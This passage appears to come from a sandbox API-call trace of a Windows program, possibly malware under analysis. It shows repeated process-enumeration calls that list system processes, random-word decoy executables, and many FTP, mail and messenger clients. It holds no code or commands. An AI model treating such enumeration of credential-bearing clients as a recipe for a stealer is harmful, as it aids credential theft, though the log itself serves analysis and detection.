lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0272.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0272.522] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0272.524] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0272.527] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0272.529] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0272.531] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0272.533] CloseHandle (hObject=0x1018) returned 1 [0272.533] Sleep (dwMilliseconds=0x64) [0272.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0272.743] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.746] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0272.747] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0272.749] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.750] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0272.752] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.753] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0272.755] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0272.756] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0272.757] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.759] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.761] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0272.763] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.764] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.765] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.767] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.768] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.770] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.771] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.772] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0272.774] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0272.775] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0272.892] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.893] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0272.895] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0272.896] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0272.898] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0272.899] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0272.900] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.902] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0272.904] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0272.906] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0272.907] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0272.908] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0272.910] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0272.911] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0272.912] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0272.914] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0272.915] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0272.918] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0272.920] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0272.921] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0272.923] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0272.924] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0272.926] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0272.927] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0272.928] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0272.930] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0272.931] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0273.031] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0273.032] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0273.034] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0273.035] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0273.037] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0273.038] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0273.040] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0273.041] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0273.044] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0273.045] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0273.047] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0273.049] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0273.051] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0273.052] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0273.054] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0273.056] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0273.057] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0273.060] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0273.062] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0273.063] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0273.065] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0273.067] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0273.068] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0273.070] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0273.072] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0273.175] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0273.178] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0273.180] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, 